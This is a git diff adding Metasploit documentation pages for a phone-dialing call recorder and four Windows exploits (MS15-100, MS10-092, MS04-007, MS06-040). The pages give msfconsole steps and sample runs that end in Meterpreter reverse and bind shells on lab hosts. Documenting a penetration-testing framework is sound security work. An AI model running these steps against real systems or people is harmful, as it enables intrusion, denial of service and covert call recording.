rapid7 · h00die · Dec 5, 2019 · Nov 27, 2019 · Nov 28, 2019 · Nov 28, 2019
diff --git a/documentation/modules/auxiliary/scanner/voice/recorder.md b/documentation/modules/auxiliary/scanner/voice/recorder.md
@@ -0,0 +1,38 @@
+## Vulnerable Application
+
+This module dials a range of phone numbers and records audio from each answered call.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/auxiliary/scanner/voice/recorder`
+3. Do: `set IAX_HOST [ip]`
+4. Do: `set OUTPUT_PATH [path]`
+5. Do: `set TARGETS [phone numbers]`
+6. Do: `run`
+
+## Scenarios
+
+ ```
+  msf > use modules/auxiliary/scanner/voice/recorder
+  msf auxiliary(scanner/voice/recorder) > set IAX_HOST 10.0.183.93
+    IAX_HOST => 10.0.183.93
+  msf auxiliary(scanner/voice/recorder) > set OUTPUT_PATH /root/audio
+    OUTPUT_PATH => /root/voice
+  msf auxiliary(scanner/voice/recorder) > set TARGETS 123-456-7890
+    TARGETS => 123-456-7890
+  msf auxiliary(scanner/voice/recorder) > run
+    [*] Dialing 123-456-7890...
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 ringing  Frames 0 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 51 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 101 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 151 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 201 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 252 DTMF ''
+    [*]   Number: 123-456-7890 answered  Frames 302 DTMF ''
+    [*]   Completed   Number: 123-456-7890  State: hangup Frames: 302 DTMF ''
+    [+] 123-456-7890 resulted in 15420 bytes of audio to /root/audio/123-456-7890.raw
+    [*] Auxiliary module execution completed
+  ```
diff --git a/documentation/modules/exploit/windows/fileformat/ms15_100_mcl_exe.md b/documentation/modules/exploit/windows/fileformat/ms15_100_mcl_exe.md
@@ -0,0 +1,35 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the .mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/windows/fileformat/ms15_100_mcl_exe`
+3. Do: `set FILENAME [filename.mcl]`
+4. Do: `set FILE_NAME [filename.exe]`
+5. Do: `set payload [windows/meterpreter/reverse_tcp]`
+6. Do: `set LHOST [IP]`
+7. Do: `exploit`
+
+## Scenarios
+
+### A run on Windows Vista (Build 6000) and Kali Linux 2019.3
+  ```
+  msf > use exploit/windows/fileformat/ms15_100_mcl_exe
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) >  set FILENAME file.mcl
+    FILENAME => file.mcl
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set FILE_NAME file.exe
+    FILE_NAME => file.exe
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
+    PAYLOAD => windows/meterpreter/reverse_tcp
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > exploit
+    [*] Server started.
+    [*] Malicious executable at \\192.168.1.3\Egoj\file.exe...
+    [*] Creating 'file.mcl' file ...
+    [+] file.mcl stored at /root/.msf4/local/file.mcl
+    [*] Sending stage (180291 bytes) to 192.168.1.2
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:49248) at 2019-11-27 10:11:45 -0700
+  ```
diff --git a/documentation/modules/exploit/windows/local/ms10_092_schelevator.md b/documentation/modules/exploit/windows/local/ms10_092_schelevator.md
@@ -0,0 +1,51 @@
+## Vulnerable Application
+
+This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
+
+## Scenarios
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
+3. Do: `set SESSION [#]`
+4. Do: `run`
+
+### A run on Windows Vista (Build 6000) and Kali Linux 2019.3
+
+  ```
+  msf > use modules/exploits/windows/local/ms10_092_schelevator
+  msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1
+    SESSION => 1
+  msf5 exploit(windows/local/ms10_092_schelevator) > run  
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe
+    [*] Creating task: TzAZ6H4K
+    [*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created.
+    [*] SCHELEVATOR
+    [*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K...
+    [*] Original CRC32: 0x69b1db25
+    [*] Final CRC32: 0x69b1db25
+    [*] Writing our modified content back...
+    [*] Validating task: TzAZ6H4K
+    [*]
+    [*] Folder: \
+    [*] TaskName                                   Next Run Time        Status
+    [*] ========================================== ==================== ===============
+    [*] TzAZ6H4K                                   12/1/2019 10:41:00 A Ready
+    [*] SCHELEVATOR
+    [*] Disabling the task...
+    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
+    [*] SCHELEVATOR
+    [*] Enabling the task...
+    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
+    [*] SCHELEVATOR
+    [*] Executing the task...
+    [*] Sending stage (180291 bytes) to 192.168.1.2
+    [*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K".
+    [*] SCHELEVATOR
+    [*] Deleting the task...
+    [*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700
+    [*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted.
+    [*] SCHELEVATOR
+  ```
diff --git a/documentation/modules/exploit/windows/smb/ms04_007_killbill.md b/documentation/modules/exploit/windows/smb/ms04_007_killbill.md
@@ -0,0 +1,31 @@
+## Vulnerable Application
+
+This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch.
+
+You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system.
+
+This exploit has been successfully tested with the win32/[all]/reverse_tcp payloads, however a few problems were encountered when using the equivalent bind payloads. Your mileage may vary.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/exploits/windows/smb/ms04_007_killbill`
+  3. Do: `set RHOSTS [IP]`
+  4. Do: `set LHOST [IP]`
+  5. Do: `set LPORT [IP]`
+  6. Do: `run`
+
+## Scenarios
+
+### A run on Windows 2000 (Build 2195, SP4) and Kali Linux 2019.3
+
+  ```      
+  msf > use modules/exploits/windows/smb/ms04_007_killbill
+  msf exploit(windows/smb/ms04_007_killbill) > set RHOSTS 192.168.1.2
+    RHOSTS => 192.168.1.2
+  msf exploit(windows/smb/ms04_007_killbill) > run
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [-] 192.168.1.2:445 - Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
+    [*] Sending stage (180291 bytes) to 192.168.1.2
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:1050) at 2019-11-27 19:08:46 -0700
+  ```
diff --git a/documentation/modules/exploit/windows/smb/ms06_040_netapi.md b/documentation/modules/exploit/windows/smb/ms06_040_netapi.md
@@ -0,0 +1,35 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all MB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use modules/exploits/windows/smb/ms06_040_netapi`
+  3. Do: `set RHOSTS [IP]`
+  4. Do: `set PAYLOAD [payload]`
+  5. Do: `set LHOST [IP]`
+  6. Do: `set LPORT [IP]`
+  7. Do: `run`
+
+## Scenarios
+
+### A run against Windows 2000 (Build 2195, SP4) and Kali Linux 2019.3
+
+  ```
+  msf exploit(windows/smb/ms06_040_netapi) > use modules/exploit/windows/smb/ms06_040_netapi
+  msf exploit(windows/smb/ms06_040_netapi) > set RHOSTS 192.168.1.2
+  msf exploit(windows/smb/ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
+  msf exploit(windows/smb/ms06_040_netapi) > exploit
+
+    [*] 192.168.1.2:445 - Detected a Windows 2000 target
+    [*] 192.168.1.2:445 - Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
+    [*] 192.168.1.2:445 - Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
+    [*] 192.168.1.2:445 - Building the stub data...
+    [*] 192.168.1.2:445 - Calling the vulnerable function...
+    [*] Started bind TCP handler against 192.168.1.2:4444
+    [*] Sending stage (180291 bytes) to 192.168.1.2
+    [*] Meterpreter session 1 opened (192.168.1.3:39603 -> 192.168.1.2:4444) at 2019-12-02 11:48:52 -0700
+
+  meterpreter >
+  ```